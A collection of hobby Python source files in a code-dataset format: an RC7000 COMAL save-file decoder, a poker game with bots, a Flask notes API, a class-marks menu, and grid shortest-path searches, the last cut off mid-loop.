0xe2:\n break\n\n if not parens and get_token(stream[0]) == \")\":\n break\n\n if stream[0] in (0x7f, 0x40,):\n yield from self.expect_number(stream)\n continue\n\n if isvar(stream[0]):\n i = list(self.expect_var(stream))\n for j in i:\n if '$' in j:\n is_string = True\n yield from i\n continue\n\n if self.peek(stream, '('):\n parens += 1\n yield \"(\"\n continue\n\n if self.peek(stream, ')'):\n assert parens > 0\n parens -= 1\n yield \")\"\n continue\n\n if stream[0] == 0xe9:\n is_string = True\n yield string(stream)\n continue\n\n token = get_token(stream[0], 3)\n if token:\n yield token\n stream.pop(0)\n continue\n\n if is_string and self.peek(stream, \",\"):\n yield \",\"\n continue\n\n if 0x41 <= stream[0] <= 0x5d:\n yield \"FN%c\" % stream.pop(0)\n continue\n\n break\n\n def expect_file(self, stream):\n ''' FILE ( number [ , expr ] ) '''\n yield from self.expect(stream, \"FILE\")\n yield from self.expect(stream, \"(\")\n yield from self.expect_number(stream)\n if self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \")\")\n\n def expect_number(self, stream):\n ''' number '''\n if stream[0] == 0x40 and stream[1] == 0x00:\n stream.pop(0)\n stream.pop(0)\n yield \"0\"\n elif stream[0] == 0x7f:\n stream.pop(0)\n if len(stream) & 1:\n stream.pop(0)\n yield number(stream)\n else:\n assert False, \"expect_number: \" + bytes(stream).hex()\n\n def expect_var(self, stream):\n ''' var '''\n var = stream.pop(0)\n assert isvar(var), \"Bad Var 0x%02x\" % var\n assert var & 0x80, \"VAR 0x%02x\" % var\n if var == 0x80:\n yield self.lvar\n vno = var & 0x7f\n if vno < len(self.up.udas.variables):\n yield self.up.udas.variables[vno].name\n else:\n yield \"VAR_0x%02x\" % var\n if get_token(stream[0]) == \"(\":\n yield from self.expect(stream, \"(\")\n yield from self.expect_expr(stream)\n while get_token(stream[0]) == \",\":\n yield from self.expect(stream, \",\")\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \")\")\n\n def render_bye(self, _stream):\n ''' BYE '''\n yield \"\"\n\n def render_call(self, stream):\n ''' CALL expr [ , expr ] ... '''\n yield from self.expect_string_expr(stream)\n while self.peek(stream, ','):\n yield \",\"\n yield from self.expect_expr(stream)\n\n def render_case(self, stream):\n ''' CASE expr OF '''\n self.indent += 1\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"OF\")\n\n def render_chain(self, stream):\n ''' CHAIN string_expr [ THEN GOTO lineno ] '''\n yield from self.expect_string_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, 'THEN')\n yield from self.expect(stream, 'GOTO')\n yield from self.expect_lineno(stream)\n\n def render_connect(self, stream):\n ''' CONNECT string [ , expr ] '''\n yield from self.expect_string_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, ',')\n yield from self.expect_expr(stream)\n\n def render_close(self, stream):\n ''' CLOSE [ file ] '''\n if stream and stream[0] != 0xe2:\n yield from self.expect_file(stream)\n\n def render_create(self, stream):\n ''' CREATE string , expr [ , expr ] '''\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, ',')\n yield from self.expect_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, ',')\n yield from self.expect_expr(stream)\n\n def render_data(self, stream):\n ''' DATA expr [ , expr ] ... '''\n yield from self.expect_expr(stream)\n while self.peek(stream, ','):\n yield from self.expect_expr(stream)\n\n def render_def(self, stream):\n ''' DEF fn var = expr '''\n yield \"FN%c\" % stream.pop(0)\n yield '('\n yield \"VAR%02x\" % stream.pop(0)\n yield ')'\n yield from self.expect(stream, '=')\n yield from self.expect_expr(stream)\n\n def render_delay(self, stream):\n ''' DELAY expr '''\n yield from self.expect_expr(stream)\n\n def render_delete(self, stream):\n ''' DELETE string_expr '''\n yield from self.expect_string_expr(stream)\n\n def render_dim(self, stream):\n ''' DIM var [ , var ] ... '''\n while stream and stream[0] != 0xe2:\n yield from self.expect_var(stream)\n if not self.peek(stream, ','):\n break\n yield \",\"\n\n def render_enter(self, stream):\n ''' ENTER string_expr '''\n yield from self.expect_string_expr(stream)\n\n def render_else(self, stream):\n ''' ELSE [ comment ] '''\n self.indent += 1\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_end(self, stream):\n ''' END [ comment ]'''\n if stream:\n yield from self.expect_comment(stream)\n\n def render_endcase(self, stream):\n ''' ENDCASE [ comment ] '''\n self.outdent += 1\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_endif(self, stream):\n ''' ENDIF [ comment ] '''\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_endproc(self, stream):\n ''' ENDPROC [ comment ] '''\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n\n def render_endwhile(self, stream):\n ''' ENDWHILE '''\n self.outdent += 1\n # XXX: Not obvious what the correct criteria is here\n # XXX: Could be original bug\n if len(stream) > 2:\n yield from self.expect_comment(stream)\n else:\n stream.pop(0)\n stream.pop(0)\n\n def render_exec(self, stream):\n ''' EXEC name '''\n yield from self.expect_var(stream)\n\n def render_for(self, stream):\n ''' FOR var = expr TO expr [ STEP expr ] '''\n self.indent += 1\n yield from self.expect_var(stream)\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"TO\")\n yield from self.expect_expr(stream)\n if stream[0] != 0xe2:\n yield from self.expect(stream, \"STEP\")\n yield from self.expect_expr(stream)\n\n def render_gosub(self, stream):\n ''' GOSUB lineno '''\n yield from self.expect_lineno(stream)\n\n def render_goto(self, stream):\n ''' GOTO lineno '''\n yield from self.expect_lineno(stream)\n\n def render_if(self, stream):\n ''' if expr THEN [ statement ] '''\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"THEN\")\n if stream[0] == 0xe2:\n self.indent += 1\n return\n yield from self.render_statement(stream)\n\n def render_input(self, stream):\n ''' INPUT string , var [ , string , var ] ... '''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n while stream and stream[0] != 0xe2:\n if stream[0] == 0xe9:\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, \",\")\n yield from self.expect_var(stream)\n if not stream or stream[0] == 0xe2:\n break\n yield from self.expect(stream, (\",\", \";\",))\n\n def render_let(self, stream):\n ''' LET var = expr [ ; var = expr ] ... '''\n while stream and stream[0] != 0xe2:\n yield from self.expect_var(stream)\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n if not stream or stream[0] == 0xe2:\n break\n yield from self.expect(stream, (\";\", \",\",))\n\n def render_mat(self, stream):\n '''\n MAT PRINT var [ {,|;} var ] ... [ {,|;} ]\n MAT READ var [ , var ] ...\n MAT var = expr\n '''\n if self.peek(stream, \"PRINT\"):\n yield \"PRINT\"\n yield from self.expect_var(stream)\n while stream and stream[0] != 0xe2:\n yield from self.expect(stream, (\",\", \";\",))\n if not stream or stream[0] == 0xe2:\n break\n return\n\n\n if self.peek(stream, \"READ\"):\n yield \"READ\"\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n yield from self.expect_var(stream)\n while self.peek(stream, ','):\n yield ','\n yield from self.expect_var(stream)\n return\n\n if isvar(stream[0]):\n yield from self.expect_var(stream)\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n return\n\n def render_new(self, _stream):\n ''' NEW '''\n yield \"\"\n\n def render_next(self, stream):\n ''' NEXT var '''\n self.outdent += 1\n stream.pop(0)\n stream.pop(0)\n yield \"\"\n\n def render_on(self, stream):\n '''\n ON ( {ESC|ERR} THEN statement )\n ON expr\n '''\n if not stream[0]:\n stream.pop(0)\n yield from self.expect(stream, (\"ESC\", \"ERR\",))\n yield from self.expect(stream, \"THEN\")\n yield from self.render_statement(stream)\n else:\n n = stream.pop(0)\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"THEN\")\n yield from self.expect(stream, (\"GOTO\", \"GOSUB\"))\n for i in range(n):\n if i:\n yield \",\"\n yield from self.expect_lineno(stream)\n\n\n def render_open(self, stream):\n ''' OPEN file_mode [ , ] expr '''\n yield from self.expect_file(stream)\n yield from self.expect_expr(stream)\n\n def render_page(self, stream):\n ''' PAGE '''\n yield from self.expect(stream, \"=\")\n yield from self.expect_expr(stream)\n\n def render_proc(self, stream):\n ''' PROC name '''\n self.indent += 1\n yield from self.expect_var(stream)\n\n def render_protect(self, stream):\n ''' PROTECT = expr '''\n yield from self.expect(stream, '=')\n yield from self.expect_expr(stream)\n\n def render_print(self, stream):\n ''' PRINT [ file ] [ USING string_expr . ] [expr] [ {,|;} expr ] ... [{,|;}]'''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n if self.peek(stream, \"USING\"):\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, (\",\", \";\",))\n while stream and stream[0] != 0xe2:\n yield from self.expect_expr(stream)\n if stream and stream[0] != 0xe2:\n yield from self.expect(stream, (\",\", \";\",))\n else:\n break\n\n def render_randomize(self, _stream):\n ''' RANDOMIZE '''\n yield \"\"\n\n def render_read(self, stream):\n ''' READ [ file ] [ , ] var [ , var ] ... '''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n yield from self.expect_var(stream)\n while self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_var(stream)\n\n def render_release(self, _stream):\n ''' RELEASE '''\n yield \"\"\n\n def render_rem(self, stream):\n ''' REM comment '''\n yield from self.expect_comment(stream)\n\n def render_rename(self, stream):\n ''' RENAME string_expr , string_expr'''\n yield from self.expect_string_expr(stream)\n yield from self.expect(stream, ',')\n yield from self.expect_string_expr(stream)\n\n def render_repeat(self, stream):\n ''' REPEAT [ comment ]'''\n self.indent = 1\n stream.pop(0)\n stream.pop(0)\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_reset(self, stream):\n ''' RESET { ESC | ERR } '''\n yield from self.expect(stream, (\"ESC\", \"ERR\",))\n\n def render_restore(self, stream):\n ''' RESET lineno '''\n yield from self.expect_lineno(stream)\n\n def render_return(self, stream):\n ''' RETURN [ comment ]'''\n if stream:\n yield from self.expect_comment(stream)\n\n def render_save(self, stream):\n ''' SAVE [ string_expr ] '''\n yield from self.expect_string_expr(stream)\n\n def render_stop(self, stream):\n ''' STOP [ comment ] '''\n if stream:\n yield from self.expect_comment(stream)\n yield \"\"\n\n def render_tab(self, stream):\n ''' TAB expr '''\n yield from self.expect_expr(stream)\n\n def render_until(self, stream):\n ''' UNTIL expr '''\n self.outdent = 1\n yield from self.expect_expr(stream)\n\n def render_when(self, stream):\n ''' WHEN expr [ , expr ] ... '''\n self.outdent = 1\n self.indent = 1\n yield from self.expect_expr(stream)\n while self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_expr(stream)\n\n def render_while(self, stream):\n ''' WHILE expr [THEN] DO '''\n self.indent = 1\n yield from self.expect_expr(stream)\n yield from self.expect(stream, \"DO\")\n\n def render_write(self, stream):\n ''' WRITE [ file ] [ , ] expr [ , expr ] ... '''\n if get_token(stream[0]) == \"FILE\":\n yield from self.expect_file(stream)\n yield from self.expect_expr(stream)\n while self.peek(stream, \",\"):\n yield \",\"\n yield from self.expect_expr(stream)\n\n def render_statement(self, stream):\n ''' render a (sub-)statement '''\n token = get_token(stream[0])\n if not token:\n return\n try:\n rfunc = getattr(self, \"render_\" + token.lower())\n except AttributeError:\n yield \"[NO RENDER FUNC %s %s]\" % (token, bytes(stream).hex())\n print(\"NO RENDER\", token, self.up.this, bytes(stream).hex())\n return\n yield from self.expect(stream, token)\n try:\n yield from rfunc(stream)\n except:\n yield \"[FAIL RENDER FUNC %s %s]\" % (token, bytes(stream).hex())\n return\n\n def render(self):\n ''' render as statement '''\n stream = list(self.this[3:])\n tokens = list(self.render_statement(stream))\n txt = \" \".join(tokens)\n if not stream or stream[0] == 0xe2:\n return txt\n print(self.up.this, self.lineno, \"DRIBBLES\", txt + \"[\" + bytes(stream).hex() + \"]\")\n return txt + \"[\" + bytes(stream).hex() + \"]\"\n\n def html_render(self):\n ''' render as statement '''\n try:\n r = self.render()\n if r:\n yield r\n return\n except UnicodeDecodeError as error:\n print(self.up.this, error, self.this.hex())\n yield \"[\" + self.this[:3].hex() + \" \" + self.this[3:].hex() + \"]\"\n\n\nclass ComalUPAS():\n ''' program segment '''\n def __init__(self, up, this):\n self.up = up\n self.this = this\n self.statements = []\n offset = 66 * 2\n while offset < len(self.this):\n i = struct.unpack(\">HB\", self.this[offset:offset + 3])\n self.statements.append(\n ComalStatement(\n self.up,\n i[0],\n self.this[offset:offset + i[1] * 2]\n )\n )\n offset += i[1] * 2\n if this[4] == 0xe9:\n self.filename = string(list(this[4:65*2]))\n else:\n self.filename = None\n\n def html_detailed(self, fo, _this):\n ''' Render program segment as listing '''\n fo.write(\"

    UPAS Segment

    \\n\")\n fo.write(\"
    \\n\")\n\n        if self.filename:\n            fo.write(\"SAVE filename: \" + self.filename + \"\\n\\n\")\n        pfx = 0\n        for i in self.statements:\n            x = list(i.html_render())\n            if i.outdent:\n                pfx -= 1\n            for j in x:\n                fo.write(\" %04d \" % i.lineno + \"  \" * pfx + j + \"\\n\")\n            if i.indent:\n                pfx += 1\n\n        fo.write(\"
    \\n\")\n\nclass ComalVariable():\n ''' A COMAL variable '''\n def __init__(self, up, this):\n self.up = up\n self.this = this\n self.name = \"\"\n self.bits = 0\n for i in range(8):\n x = this[i]\n if i == 0 and x > 127:\n self.bits |= 1 << i\n x -= 128\n elif i == 1:\n if x & 1:\n self.bits |= 1 << i\n x >>= 1\n if not x:\n break\n if 32 < x < 127:\n self.name += \"%c\" % x\n else:\n self.name += \"{%d}\" % x\n\n if self.bits & 2:\n self.name += \"$\"\n\n self.ptr = struct.unpack(\">H\", this[8:10])[0]\n\n # print(\"VAR\", self.name, self.bits, self.ptr, this.hex())\n\n def html_render(self):\n ''' Render '''\n return \"0x%04x 0x%02x %s\" % (self.ptr, self.bits, self.name)\n\nclass ComalUDAS():\n ''' Data segment '''\n def __init__(self, up, this):\n self.up = up\n self.this = this\n\n self.variables = []\n for offset in range(104*2, self.up.u_dvs * 2, 10):\n self.variables.append(ComalVariable(self.up, self.this[offset:offset + 10]))\n\n def html_detailed(self, fo, _this):\n ''' dump variables '''\n fo.write(\"

    UDAS Segment

    \\n\")\n fo.write(\"
    \\n\")\n        words = list(struct.unpack(\">104H\", self.this[:104*2]))\n\n        for i in range(29):\n            fo.write(\"    FN%c definition = 0x%04x\\n\" % (0x41 + i, words.pop(0)))\n\n        def stack7(what):\n            fo.write(\"    %s stack pointer = 0x%04x\\n\" % (what, words.pop(0)))\n            for i in range(7):\n                fo.write(\"      stack[%d] = 0x%04x\\n\" % (i, words.pop(0)))\n\n        stack7(\"GOSUB-RETURN\")\n\n        fo.write(\"    FOR-NEXT stack pointer = 0x%04x\\n\" % words.pop(0))\n        for i in range(7):\n            fo.write(\"      Var# = 0x%04x\\n\" % words.pop(0))\n            fo.write(\"      Loop Top = 0x%04x\\n\" % words.pop(0))\n            for j in (\"To\", \"Step\"):\n                x = words.pop(0)\n                y = words.pop(0)\n                z = number([x >> 8, x & 0xff, y >> 8, y & 0xff])\n                fo.write(\"      %s Val = %s\" % (j, z))\n                fo.write(\"   (0x%04x%04x)\\n\" % (x, y))\n\n        stack7(\"REPEAT-UNTIL\")\n        stack7(\"WHILE-ENDWHILE\")\n        stack7(\"IF-ELSE\")\n        assert not words\n        fo.write(\"Variables:\\n\")\n        for n, i in enumerate(self.variables):\n            fo.write(\"    0x%02x %s\\n\" % (n + 0x80, i.html_render()))\n        # XXX values\n        fo.write(\"
    \\n\")\n\n\nclass ComalSaveFile():\n ''' A RC7000 COMAL SAVE file '''\n def __init__(self, this):\n if len(this) < 64 or this[:2] not in (b'SV', b'N2', b'RO'):\n return\n if this.has_type(\"COMAL_SAVE\"):\n return\n\n self.head = struct.unpack(\">BBHH\", this[0:6])\n\n offset = 6 + 2 * sum(self.head[2:])\n self.uvars = (\n (\"dvs\", \"Start på savede variabel indhold (word adr)\"),\n (\"nds\", \"Address på næste prog.sætning (word adr)\"),\n (\"cps\", \"Address på curr prog.sætning (word adr)\"),\n (\"tll\", \"Page størrelse\"),\n (\"tts\", \"TAP størrelse\"),\n (\"ran\", \"Random tal\"),\n (\"cdl\", \"Current DATA sætning ptr\"),\n (\"cdb\", \"Current DATA byte ptr\"),\n (\"esa\", \"ON ESE (word adr)\"),\n (\"era\", \"ON ERR (word adr)\"),\n (\"cas\", \"CASE dybde\"),\n (\"las\", \"last (-1)\"),\n )\n\n for b, _c in self.uvars:\n if offset + 2 > len(this):\n return\n i = struct.unpack(\">H\", this[offset:offset + 2])\n setattr(self, \"u_\" + b, i[0])\n offset += 2\n\n if self.u_las != 0xffff:\n return\n\n this = this.create(start=0, stop=offset)\n self.this = this\n this.add_type(\"COMAL_SAVE\")\n\n offset = 6\n length = self.head[2] * 2\n self.upas = ComalUPAS(self, this.create(start=offset, stop=offset+length))\n\n offset += length\n length = self.head[3] * 2\n self.udas = ComalUDAS(self, this.create(start=offset, stop=offset+length))\n\n this.add_interpretation(self, self.upas.html_detailed)\n this.add_interpretation(self, self.udas.html_detailed)\n this.add_interpretation(self, self.html_detailed)\n\n def html_detailed(self, fo, _this):\n ''' The status words '''\n fo.write(\"

    Wrapper

    \\n\")\n fo.write(\"
    \\n\")\n\n        words = struct.unpack(\">BBHH\", self.this[0:6])\n        fo.write(\".magic = 0x%02x%02x\\n\" % (words[0], words[1]))\n        fo.write(\".u_pas = 0x%04x  // Length of UPAS in words\\n\" % words[2])\n        fo.write(\".u_das = 0x%04x  // Length of UDAS in words\\n\" % words[3])\n        for b, c in self.uvars:\n            i = getattr(self, \"u_\" + b)\n            fo.write(\".u_%s = 0x%04x  // %s\\n\" % (b, i, c))\n\n        fo.write(\"
    \\n\")\n","repo_name":"Datamuseum-DK/AutoArchaeologist","sub_path":"autoarchaeologist/regnecentralen/rc7000_comal.py","file_name":"rc7000_comal.py","file_ext":"py","file_size_in_byte":29231,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"10680315230","text":"import numpy as np\nfrom player import *\nfrom hand_strength import get_score, hand_strength, vencedor_linha\nfrom bot import place_cards\nfrom royalties import pontos2,pontos3\n\nclass Game:\n def __init__(self, n_players, n_AIs, thread_scale,num_jogadores = 1):\n \"\"\"\n Class associada ao jogo de Poker, onde temos um baralho de 52 cartas,\n \\'2,3,4,5,6,7,8,9,10,J,Q,K,A\\' com 4 nipes cada uma das cartas\n \\'S\\' - Spades\n \\'H\\' - Hearts\n \\'C\\' - Clubs\n \\'D\\' - Diamons\n \"\"\"\n self.thread_scale = thread_scale\n while n_players + n_AIs > 3:\n print(\"Maximo 3 jogadores\")\n n_players = input(\"Number of human players\\n>>>\")\n n_AIs = input(\"Number of BOTS\\n>>>\")\n\n self.players_list = []\n self.AIs_list = []\n\n for i in range(n_players):\n #listab de players\n nome = input(f\"Player {i+1} what is your name?\\n>>>\")\n self.players_list += [Player(nome)] \n\n for i in range(n_AIs):\n self.AIs_list += [Player(f\"AI {i+1}\")]\n\n self.baralho = self.create_deck()\n self.run_game_until()\n\n def create_deck(self):\n h_cards = np.array([\"T\", \"Q\", \"J\", \"K\", \"A\"])\n l_cards = np.linspace(2, 9, 8, dtype = int)\n num_cards = np.concatenate((h_cards, l_cards))\n nipes = [\"S\", \"H\", \"C\", \"D\"]\n deck = []\n \n for nipe in nipes:\n for num in num_cards:\n deck += [num + nipe]\n \n return np.array(deck)\n \n def draw_card(self, player):\n card = np.random.choice(self.baralho)\n self.baralho = np.delete(self.baralho, np.argwhere(self.baralho == card))\n \n player.give_card(card)\n\n return card\n \n def game_loop(self):\n \"\"\"\n Loop associado a um jogo de POFCP\n \"\"\"\n\n # PLayers Turn\n for player in self.players_list:\n\n # Tirar as primeiras 5 cartas \n for _ in range(5):\n card = self.draw_card(player)\n \n # Primeira Mão Player\n print(6*\"#\" + f\" {player.name} \" + 6*\"#\")\n print(f\"Saiu lhe a seguinte m`ão {player.hand}\")\n\n for i in range(5):\n pos = input(f\"Onde quer colocar {player.hand[i]}?\\n>>> \")\n player.add_2_table(pos)\n \n print(player.field)\n print(2*\"\\n\")\n\n # BOTS Turn\n for bot in self.AIs_list:\n\n # Tirar as primeiras 5 cartas\n for _ in range(5):\n card = self.draw_card(bot)\n\n print(6*\"#\" + f\" {bot.name} \" + 6*\"#\")\n print(f\"Saiu lhe a seguinte mão {bot.hand}\")\n \n place_AI = place_cards(self, bot, bot.hand, self.thread_scale)[0]\n print(place_AI)\n for i in range(5):\n if place_AI[i] == 0:\n bot.add_2_table(\"top\")\n elif place_AI[i] == 1:\n bot.add_2_table(\"mid\")\n else:\n bot.add_2_table(\"bot\")\n \n print(bot.field)\n print(2*\"\\n\")\n\n num_cards = sum([len(player.hand) for player in self.players_list + self.AIs_list])/ (len(self.players_list) + len(self.AIs_list))\n\n while num_cards != 13:\n\n # Player 3cards game cicle\n for player in self.players_list:\n print(6*\"#\" + f\" {player.name} \" + 6*\"#\") # Vez do jogador 1 jogar\n cards = np.array([])\n \n for _ in range(3):\n card = self.draw_card(player)\n cards = np.append(cards, card)\n \n print(player.field)\n card_off = input(f\"{player.name} saiu lhe as seguintes {cards} qual quer descartar?\\n>>> \")\n \n while card_off not in cards:\n card_off = input(f\"Carta inválida!! {cards} qual quer descartar?\\n>>> \")\n \n player.add_lixo(card_off)\n cards = np.delete(cards, np.argwhere(cards == card_off))\n \n for card in cards: \n pos = input(f\"{player.name} saiu lhe {card} onde quer por a carta?\\n>>> \")\n player.add_2_table(pos)\n \n print(2*\"\\n\")\n\n # Player 3cards game cicle\n for bot in self.AIs_list:\n\n print(6*\"#\" + f\" {bot.name} \" + 6*\"#\")\n cards = np.array([])\n \n for _ in range(3):\n card = self.draw_card(bot)\n cards = np.append(cards, card)\n \n AI_move = place_cards(self, bot, cards, self.thread_scale)\n place_AI = AI_move[0]\n card_off = AI_move[1]\n \n bot.add_lixo(card_off)\n cards = np.delete(cards, np.argwhere(cards == card_off))\n \n for i in range(2):\n j = i\n if len(place_AI) == 1:\n j = 0\n if place_AI[j] == 0:\n bot.add_2_table(\"top\")\n elif place_AI[j] == 1:\n bot.add_2_table(\"mid\")\n else:\n bot.add_2_table(\"bot\")\n\n print(bot.field)\n print(2*\"\\n\")\n\n num_cards = sum([len(player.hand) for player in self.players_list + self.AIs_list])/ (len(self.players_list) + len(self.AIs_list))\n \n print(\"Vamos calcular os pontos\")\n for player in self.players_list + self.AIs_list:\n print(6*\"#\" + f\" {player.name} \" + 6*\"#\")\n print(player.field)\n\n players_wins = self.players_list + self.AIs_list\n winner = players_wins[0]\n max_poinst = -1\n no_winners_flag = False\n if len(players_wins)==2:\n pontos = pontos2(players_wins[0],players_wins[1])\n elif len(players_wins)==3: \n pontos = pontos3(players_wins[0],players_wins[1],players_wins[2])\n \n for point, player in zip(pontos, players_wins):\n player.update_points(point)\n print(f\"{player.name}: {player.points}\")\n\n def run_game_until(self, points_th = 5):\n max_point = 0\n \n while max_point < points_th:\n self.game_loop()\n max_point = 0\n players_list = self.players_list + self.AIs_list\n for i in range(len(self.players_list) + len(self.AIs_list)):\n max_point = max(max_point, players_list[i].points)\n self.baralho = self.create_deck()\n players = self.players_list + self.AIs_list\n\n for player in players:\n player.reset()\ndef main():\n jogo = Game(0,3,0)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mArcio-Lmano/OFCP","sub_path":"PPL_proj.py","file_name":"PPL_proj.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37405457224","text":"from flask import Flask, jsonify\nfrom flask_restful import Resource, Api, reqparse\nimport pymysql\nimport pymysql.cursors\nimport json\n\n\nconnection = pymysql.connect(host='localhost',\n user='root',\n password='',\n db='notas',\n charset='utf8mb4',\n cursorclass=pymysql.cursors.DictCursor)\n\napp = Flask(__name__)\napi = Api(app)\nparser = reqparse.RequestParser()\n\n@app.route(\"/notes.php\")\ndef lista():\n with connection.cursor() as cursor:\n # Read a single record\n sql = \"SELECT * FROM `nota`\"\n cursor.execute(sql)\n result = cursor.fetchall()\n return jsonify(result)\n\n@app.route(\"/save.php\", methods=['POST'])\ndef save():\n x={}\n parser.add_argument('title', type=str)\n parser.add_argument('note', type=str)\n parser.add_argument('color', type=int)\n args = parser.parse_args()\n with connection.cursor() as cursor: \n sql = \"INSERT INTO `nota` (`title`, `note`, `color`) VALUES (%s, %s, %s)\"\n result = cursor.execute(sql, (args['title'], args['note'], args['color']))\n \n if result == 1:\n x = {\n \"success\": True,\n \"message\": 'Successfully', \n }\n else :\n x = {\n \"success\": False,\n \"message\": 'Failure', \n }\n\n\n connection.commit()\n return(jsonify(x))\n\n@app.route(\"/update.php\", methods=['POST'])\ndef update():\n x={}\n parser.add_argument('id', type=int)\n parser.add_argument('title', type=str)\n parser.add_argument('note', type=str)\n parser.add_argument('color', type=int)\n args = parser.parse_args()\n with connection.cursor() as cursor: \n sql = \"UPDATE `nota` SET title=%s, note=%s, color=%s WHERE `id`= %s \"\n result = cursor.execute(sql, (args['title'], args['note'], args['color'],args['id']))\n \n if result == 1:\n x = {\n \"success\": True,\n \"message\": 'Successfully', \n }\n else :\n x = {\n \"success\": False,\n \"message\": 'Failure', \n }\n\n\n connection.commit()\n return(jsonify(x))\n\n@app.route(\"/delete.php\", methods=['POST'])\ndef delete():\n x={}\n parser.add_argument('id', type=int) \n args = parser.parse_args()\n with connection.cursor() as cursor: \n sql = \"DELETE FROM nota WHERE id='%s'\"\n result = cursor.execute(sql, (args['id']))\n \n if result == 1:\n x = {\n \"success\": True,\n \"message\": 'Successfully', \n }\n else :\n x = {\n \"success\": False,\n \"message\": 'Failure', \n }\n\n\n connection.commit()\n return(jsonify(x))\n\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", port=5000)","repo_name":"jorgepaz96/api_rest_python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43982036411","text":"menu = \"\"\"a) The average score of class\nb) The Highest score and lowest score of class\nc) Count of students who were absent for the test\nd) Display the no, of students in the specific range\ne) Enter e to exit.\n\"\"\"\nprint(menu)\nmarks = []\nfor i in range(10):\n\tstudent = {'Name': str(i), 'Score': 80 + i}\n\tmarks.append(student)\navg = 0\narr = []\nabsent = 0\nfor i in marks:\n\tavg += i['Score']\n\tarr.append(i['Score'])\n\tif i['Score'] < 0:\n\t\tabsent += 1\navg = avg / len(marks)\nmax_marks = max(arr)\nmin_marks = min(arr)\nwhile True:\n\tchoice = input(\"Enter your choice: \").lower()\n\tif choice == 'a':\n\t\tprint(\"Avg of class is \", avg)\n\telif choice == 'b':\n\t\tprint('Max:', max_marks, 'Min:', min_marks)\n\telif choice == 'c':\n\t\tprint('Absent', absent)\n\telif choice == 'd':\n\t\tx, y = map(int, input('Enter the range: ').split())\n\t\tcnt = 0\n\t\tfor i in marks:\n\t\t\tif x <= i['Score'] < y:\n\t\t\t\tcnt += 1\n\t\tprint(\"No of students in the given range is \", cnt)\n\telif choice == 'e':\n\t\texit(1)\n\telse:\n\t\tprint('Enter a valid choice.')\n","repo_name":"saikiranreddyappidi/pythonModuleBank","sub_path":"_6_class_marks.py","file_name":"_6_class_marks.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"4669071754","text":"import numpy as np\n\nlines = open(\"input\", \"r\").readlines()\narray = [list(line.strip()) for line in lines]\nres_array = np.zeros(np.array(array).shape).astype(int)\n\nnetwork = {}\n\nfor i in range(len(array)):\n for j in range(len(array[i])):\n source = (i, j)\n targets = []\n if i - 1 >= 0:\n targets.append((i - 1, j))\n if i + 1 < len(array):\n targets.append((i + 1, j))\n if j - 1 >= 0:\n targets.append((i, j - 1))\n if j + 1 < len(array[i]):\n targets.append((i, j + 1))\n\n network[source] = [(targ, int(array[targ[0]][targ[1]])) for targ in targets]\n\n\nqueue = [((0, 0), 0, (0, 0))]\nshape = res_array.shape\nvisited = set()\npath = {}\n\nwhile queue:\n coord, current_val, from_coord = queue.pop(0)\n if coord in visited:\n continue\n\n path[from_coord] = coord\n\n visited.add(coord)\n res_array[coord] = current_val\n if coord == (shape[0] - 1, shape[1] - 1):\n break\n\n targets = network[coord]\n new_targets = [\n (t[0], t[1] + current_val, coord) for t in targets if t[0] not in visited\n ]\n queue.extend(new_targets)\n queue.sort(key=lambda x: x[1])\n array[coord[0]][coord[1]]\n\n\nprint(res_array)\nprint(coord, shape, current_val, len(visited))\n","repo_name":"ProgHaj/AdventOfCode2021","sub_path":"15/p1t2.py","file_name":"p1t2.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21850750117","text":"import sys\nimport heapq\ninput = sys.stdin.readline\n\nn = int(input())\nm = int(input())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\ndistance = [sys.maxsize] * (n+1)\nstart, end = map(int, input().split())\n\nq = []\nheapq.heappush(q, (0, start))\ndistance[start] = 0\nwhile q:\n dist, node = heapq.heappop(q)\n\n if distance[node] < dist:\n continue\n\n for neigh, cost in graph[node]:\n if distance[neigh] > dist + cost:\n distance[neigh] = 